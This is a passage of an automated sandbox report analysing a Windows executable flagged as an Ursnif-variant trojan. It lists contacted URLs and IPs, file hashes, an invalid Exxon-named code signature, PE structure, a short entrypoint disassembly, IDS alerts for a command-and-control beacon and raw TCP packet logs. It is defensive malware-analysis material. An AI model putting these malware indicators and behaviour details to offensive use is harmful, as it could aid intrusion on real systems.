                                      https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58ba&amp;bhid=6203eb0e7db0ad17f44b22d8&aInstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&amp;anoncknm=%22%22&amp;name=%22MInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn.hoergeraete.hoeren-heute.ch/horizon_reveal/?act=ACT0000040013ACT&amp;utm_source=mcrs&ampInstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.msn.com/de-ch/sport/other/der-fcz-verabschiedet-sich-von-doumbia-und-ceesay/ar-AAXsezM?oInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.msn.com/de-ch/news/other/stadtrat-handelt-in-z%c3%bcrich-west-mehr-preisg%c3%bcnstige-woInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://deff.nelreports.net/api/report?cat=msnInstallUtil.exe, 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.msn.com/de-ch/news/other/autofahrer-38-rast-mit-94-km-h-durch-30er-zone/ar-AAXsnwd?ocid=InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://ogp.me/ns/fb#InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.msn.com/de-ch/news/other/olivia-und-noah-sind-die-beliebtesten-baby-vornamen-in-z%c3%bcrInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.msn.com/de-ch/news/other/z%c3%bcrcher-kantonsrat-pr%c3%bcft-nach-igelkot-vorfall-sicherhInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.msn.com/de-chInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58b8&amp;bhid=62470ee6adad76040858398f&aInstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      13.107.40.203
                                                      		a-0003.fbs2-a-msedge.netUnited States
                                                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:630152
                                                      Start date and time: 19/05/202214:38:372022-05-19 14:38:37 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 6m 49s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:OojqjHGE0W.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@3/0@2/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 96.7% (good quality ratio 96.7%)
                                                      • Quality average: 91.3%
                                                      • Quality standard deviation: 14%
                                                      HCA Information:
                                                      • Successful, ratio: 69%
                                                      • Number of executed functions: 20
                                                      • Number of non-executed functions: 7
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 52.169.118.173
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, redirection.prod.cms.msn.com.akadns.net, ctldl.windowsupdate.com, legacy-redirection-neurope-prod-hp.cloudapp.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: OojqjHGE0W.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      13.107.40.203609E5ECDDA8C08C02C123B8376566361568646EEA8B50.exeGet hashmaliciousBrowse
                                                        v9ZD101UF6.exeGet hashmaliciousBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          a-0003.fbs2-a-msedge.net609E5ECDDA8C08C02C123B8376566361568646EEA8B50.exeGet hashmaliciousBrowse
                                                          • 13.107.40.203

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          MICROSOFT-CORP-MSN-AS-BLOCKUSeE6cagogwqGet hashmaliciousBrowse
                                                          • 104.215.126.128
                                                          Olf76DB7wpGet hashmaliciousBrowse
                                                          • 20.31.98.77
                                                          EY_Document_Order4590.exeGet hashmaliciousBrowse
                                                          • 51.142.243.136
                                                          Remittance Advice.xlsmGet hashmaliciousBrowse
                                                          • 52.109.28.107
                                                          pandora.armGet hashmaliciousBrowse
                                                          • 65.55.103.18
                                                          https://giz-paraguay.wixsite.com/owa-domain-updateGet hashmaliciousBrowse
                                                          • 13.107.43.14
                                                          doc_1093983787847_484778333.pdf.vbsGet hashmaliciousBrowse
                                                          • 13.107.43.12
                                                          INV-PL-CMR.vbsGet hashmaliciousBrowse
                                                          • 13.107.43.13
                                                          SecuriteInfo.com.W32.AIDetect.malware2.18832.exeGet hashmaliciousBrowse
                                                          • 20.106.79.78
                                                          bank_payment-doc.exeGet hashmaliciousBrowse
                                                          • 51.141.106.0
                                                          IMG_1900037679995756674.exeGet hashmaliciousBrowse
                                                          • 13.107.43.12
                                                          https://1drv.ms/b/s!Ahxi4mLGHMVYgQGHnHcUVMM4VPCLGet hashmaliciousBrowse
                                                          • 13.107.43.12
                                                          HLNGQDZK.EXEGet hashmaliciousBrowse
                                                          • 20.106.79.78
                                                          rubix.arm7Get hashmaliciousBrowse
                                                          • 52.113.110.229
                                                          9jquF7No4YGet hashmaliciousBrowse
                                                          • 20.115.194.36
                                                          kPWxmSPU8bGet hashmaliciousBrowse
                                                          • 163.228.110.173
                                                          ZJ1s1xZgpLGet hashmaliciousBrowse
                                                          • 138.239.244.156
                                                          https://t-b3g.club/?e=emmari@datacom.co.nzGet hashmaliciousBrowse
                                                          • 20.26.217.32
                                                          phantom.arm7Get hashmaliciousBrowse
                                                          • 13.65.160.252
                                                          phantom.armGet hashmaliciousBrowse
                                                          • 20.11.48.38

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          No created / dropped files found

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.52461417001665
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:OojqjHGE0W.exe
                                                          File size:1241656
                                                          MD5:4ed3fa33609a51baf209a5954bef6633
                                                          SHA1:aff82f0554f18c780561d6b8b1ca5a1001e42512
                                                          SHA256:988177454fe3a5ba8fcdf7f3124e2c56f312b776542d3763540c254df6fe6f76
                                                          SHA512:3beaba94d2a6df632b029d0c48521cea8adb98a1b7eeee9d547544415b36a251c41fabce2bcbbdaf53f4e090783f49d7c10e5d952d9313aa182aa1c2971201f4
                                                          SSDEEP:24576:21uu0F2xRqVHdQ9PerE5gOGFGtCZXUzvjJMFHk1Udgd:A02WdQ9GCOFb6eXO
                                                          TLSH:AC4501017D8CC031ECA226B43836E295A13B7D81672664CB65F9B3AF95B1BC0DD79363
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t.....U.].....`.d.....T.....}.m.s...t...,.....Q.v.....d.u...t.i.r.....c.u...Richt...................PE..L......b...

                                                          File Icon

                                                          Icon Hash:54f9e0c4dcf8705d

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x411fc0
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x6283FED8 [Tue May 17 20:00:24 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:06a834e3824803366fcfecb5c9777295

                                                          Authenticode Signature

                                                          Signature Valid:false
                                                          Signature Issuer:CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                          Signature Validation Error:A certificate chain could not be built to a trusted root authority
                                                          Error Number:-2146762486
                                                          Not Before, Not After
                                                          • 12/29/2021 4:00:00 PM 9/2/2022 4:59:59 PM
                                                          Subject Chain
                                                          • CN=exxon.com, O=Exxon Mobil Corporation, L=Irving, S=Texas, C=US
                                                          Version:3
                                                          Thumbprint MD5:B7C2B39C14AF65D1434078B10A8064DE
                                                          Thumbprint SHA-1:9B93192A2BF5E6EC0A32E4966431D1E2FD1FA4AF
                                                          Thumbprint SHA-256:97135CBA56D0300287DF31C8B39546AD4605FB9C88311AEB0B12B76AC15C46BF
                                                          Serial:0A2787FBB4627C91611573E323584113

                                                          Entrypoint Preview

                                                          Instruction
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          call 00007FEAECD8B32Bh
                                                          call 00007FEAECD8B036h
                                                          pop ebp
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          push FFFFFFFEh
                                                          push 00511B30h
                                                          push 00416210h
                                                          mov eax, dword ptr fs:[00000000h]
                                                          push eax
                                                          add esp, FFFFFF98h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          mov eax, dword ptr [00513064h]
                                                          xor dword ptr [ebp-08h], eax
                                                          xor eax, ebp
                                                          push eax
                                                          lea eax, dword ptr [ebp-10h]
                                                          mov dword ptr fs:[00000000h], eax
                                                          mov dword ptr [ebp-18h], esp
                                                          mov dword ptr [ebp-70h], 00000000h
                                                          lea eax, dword ptr [ebp-60h]
                                                          push eax
                                                          call dword ptr [00401044h]
                                                          cmp dword ptr [00515DDCh], 00000000h
                                                          jne 00007FEAECD8B010h
                                                          push 00000000h
                                                          push 00000000h
                                                          push 00000001h
                                                          push 00000000h
                                                          call dword ptr [00401040h]
                                                          call 00007FEAECD8B193h
                                                          mov dword ptr [ebp-6Ch], eax
                                                          call 00007FEAECD8F16Bh
                                                          test eax, eax
                                                          jne 00007FEAECD8B00Ch
                                                          push 0000001Ch
                                                          call 00007FEAECD8B150h
                                                          add esp, 04h
                                                          call 00007FEAECD8EAC8h
                                                          test eax, eax
                                                          jne 00007FEAECD8B00Ch
                                                          push 00000010h
                                                          call 00007FEAECD8B13Dh

                                                          Rich Headers

                                                          Programming Language:
                                                          • [LNK] VS2010 build 30319
                                                          • [ASM] VS2010 build 30319
                                                          • [ C ] VS2010 build 30319
                                                          • [C++] VS2010 build 30319
                                                          • [RES] VS2010 build 30319
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1121140x50.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1160000x17630.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x12de000x1438
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12e0000x1638.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x11800x1c.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x81180x40.text
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x140.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x11184a0x111a00False0.832347104842data7.57139474025IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .data0x1130000x2de00x1000False0.190673828125data2.23907016207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x1160000x176300x17800False0.692538646941data6.63567575561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x12e0000x36a40x3800False0.331473214286data3.51322756003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x1163d00xd633PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                          RT_ICON0x123a080x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                          RT_ICON0x127c300x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                          RT_ICON0x12a1d80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 41910143
                                                          RT_ICON0x12b2800x988data
                                                          RT_ICON0x12bc080x468GLS_BINARY_LSB_FIRST
                                                          RT_MENU0x12d3800x4data
                                                          RT_DIALOG0x12d3880xf0data
                                                          RT_DIALOG0x12d4780x88data
                                                          RT_DIALOG0x12d5000x12cdata
                                                          RT_STRING0x12c2b80x1e8data
                                                          RT_STRING0x12c4a00x424data
                                                          RT_STRING0x12c8c80x43cdata
                                                          RT_STRING0x12cd080x4fcdata
                                                          RT_STRING0x12d2080x174data
                                                          RT_GROUP_ICON0x12c0700x5adata
                                                          RT_VERSION0x12c0d00x1e4data

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetProcAddress, GetTapeStatus, Sleep, LocalAlloc, CloseHandle, CreateActCtxW, SetCurrentDirectoryA, LoadLibraryW, GetModuleHandleW, ResetEvent, GetCommandLineW, HeapSetInformation, GetStartupInfoW, SetUnhandledExceptionFilter, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, InterlockedIncrement, InterlockedDecrement, DecodePointer, ExitProcess, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, HeapValidate, IsBadReadPtr, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, GetConsoleMode, RaiseException, SetStdHandle, CreateFileW, FlushFileBuffers
                                                          GDI32.dllStrokePath
                                                          ADVAPI32.dllStartServiceA, CloseEventLog

                                                          Version Infos

                                                          DescriptionData
                                                          LegalCopyrightCopyright 2012-2022 by Kone LLC All Rights Reserved.
                                                          FileVersion87.90.67.49
                                                          ProductVersion70.56.51.66
                                                          Translation0x0838 0x03a4

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          192.168.2.352.169.118.17349702802033203 05/19/22-14:41:40.292996TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4970280192.168.2.352.169.118.173
                                                          192.168.2.352.169.118.17349702802033204 05/19/22-14:41:40.292996TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4970280192.168.2.352.169.118.173

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 19, 2022 14:41:40.411487103 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.451590061 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.454516888 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.455178022 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.497522116 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.559830904 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.559859991 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.559952974 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.597235918 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.672713995 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.899105072 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.899158001 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.899280071 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.899312973 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.899624109 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.899714947 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.899843931 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.899908066 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.899981022 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.900038958 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.900139093 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.900206089 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.900228977 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.900290966 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.900367022 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.900387049 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.900490999 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.901165009 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901251078 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.901267052 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901326895 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.901454926 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901515961 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.901649952 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901673079 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901721001 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901721954 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.901740074 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.901740074 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901761055 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901782990 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901804924 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.901818991 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.901851892 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.901859999 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.939166069 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939214945 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939244032 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939275980 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939341068 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.939419985 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.939547062 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939582109 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939611912 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939615011 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.939640045 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939672947 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.939692020 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939724922 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.939743042 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939773083 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.939801931 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.939929962 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939976931 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.939985037 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.940009117 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.940037966 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.940047026 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.940068960 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.940104961 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.940218925 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.940260887 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.940289974 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.940351009 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941071033 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941108942 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941138029 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941155910 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941165924 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941198111 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941199064 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941226006 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941261053 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941303968 CEST4970380192.168.2.313.107.40.203
                                                          May 19, 2022 14:41:40.941472054 CEST804970313.107.40.203192.168.2.3
                                                          May 19, 2022 14:41:40.941521883 CEST804970313.107.40.203192.168.2.3
